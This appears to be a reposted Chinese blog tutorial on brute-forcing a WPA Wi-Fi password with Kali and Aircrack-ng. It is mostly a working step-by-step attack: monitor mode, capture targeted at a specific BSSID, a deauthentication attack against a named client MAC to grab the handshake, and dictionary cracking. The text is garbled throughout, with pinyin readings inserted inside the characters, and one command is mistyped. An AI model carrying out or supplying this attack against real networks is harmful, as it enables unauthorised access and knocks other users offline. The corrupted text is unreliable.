攻擊機:kali
所采用的的無線網(wǎng)卡:D-LINK
采用的工具:Aircrack-ng
測試開始:
首先,打開kali,將無線網(wǎng)卡插入。彈出提示窗口,這里選擇連接到虛擬機,選擇kali虛擬機。
然后點擊網(wǎng)絡連接的標志,可以看到當前環(huán)境的wifi列表。
使用命令ifconfig和iwconfig,都可以看到wlan0已開啟。
現(xiàn)在開始爆破。
這里的字典是我自己常用的,大家可以自行尋找字典。
(1)清除進程:airmon-ng check kall
(2)開啟監(jiān)聽:airmon-ng start wlan0
可以看到已成功開啟監(jiān)聽的進程。
再查看網(wǎng)卡狀態(tài)。發(fā)現(xiàn)是wlan0mon,表示已進入監(jiān)聽狀態(tài)
?文章來源地址http://www.zghlxwxcb.cn/news/detail-405770.html
(3)開始掃描wifi,airodump-ng wlan0mon
-
BSSID:路由器的MAC地址
-
PWR:信號值,絕對值越低,說明信號越強
-
CH:當前路由器使用的信道
掃描出來了,這里選擇PWR的絕對值小的,絕對值越小信號越高,這里都是負值,所以選擇負值越最大的。
掃描的時候可能沒法復制,大家選好要用的目標后,ctrl+c結束掃描,然后復制bssid。
我選擇 這個-38的。
(4)開始監(jiān)聽該wifi:
airodump-ng --bssid CC:34:29:95:A5:4A -c 8 -w text wlan0mon
--bssid 后輸入wifi的bssid
-c 后輸入wifi 的信道值ch
-w 后是自己命名的監(jiān)聽到的握手包的名字,自己定義即可
(5)選擇一個目標進行攻擊,依次拿到握手包。這里的原理大家自行百度一下。
aireplay-ng -0 10 -a CC:34:29:95:A5:4A -c 50:2F:9B:14:86:0B wlan0mon
-0:制定攻擊次數(shù)。
-a:路由器的bssid值
-c:目標mac地址
看到攻擊成功。
?
(6)開始爆破密碼:
aircrack-ng -a2 -b CC:34:29:95:A5:4A -w /usr/share/seclists/wifi_top2000_passwd.txt text-01.cap
-a2 代表WPA的握手包
-b 指定要破解的wifi的BSSID
-w 指定字典文件
字典后接我們監(jiān)聽抓到的cap包
‘’
?這里是我日常家用的wifi所以字典很快就刨出來了。大家可以自行加強字典強度。
?文章來源:http://www.zghlxwxcb.cn/news/detail-405770.html
?
?
?
?
到了這里,關于無線網(wǎng)卡+kali實現(xiàn)wifi暴力破解(密碼爆破方式)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!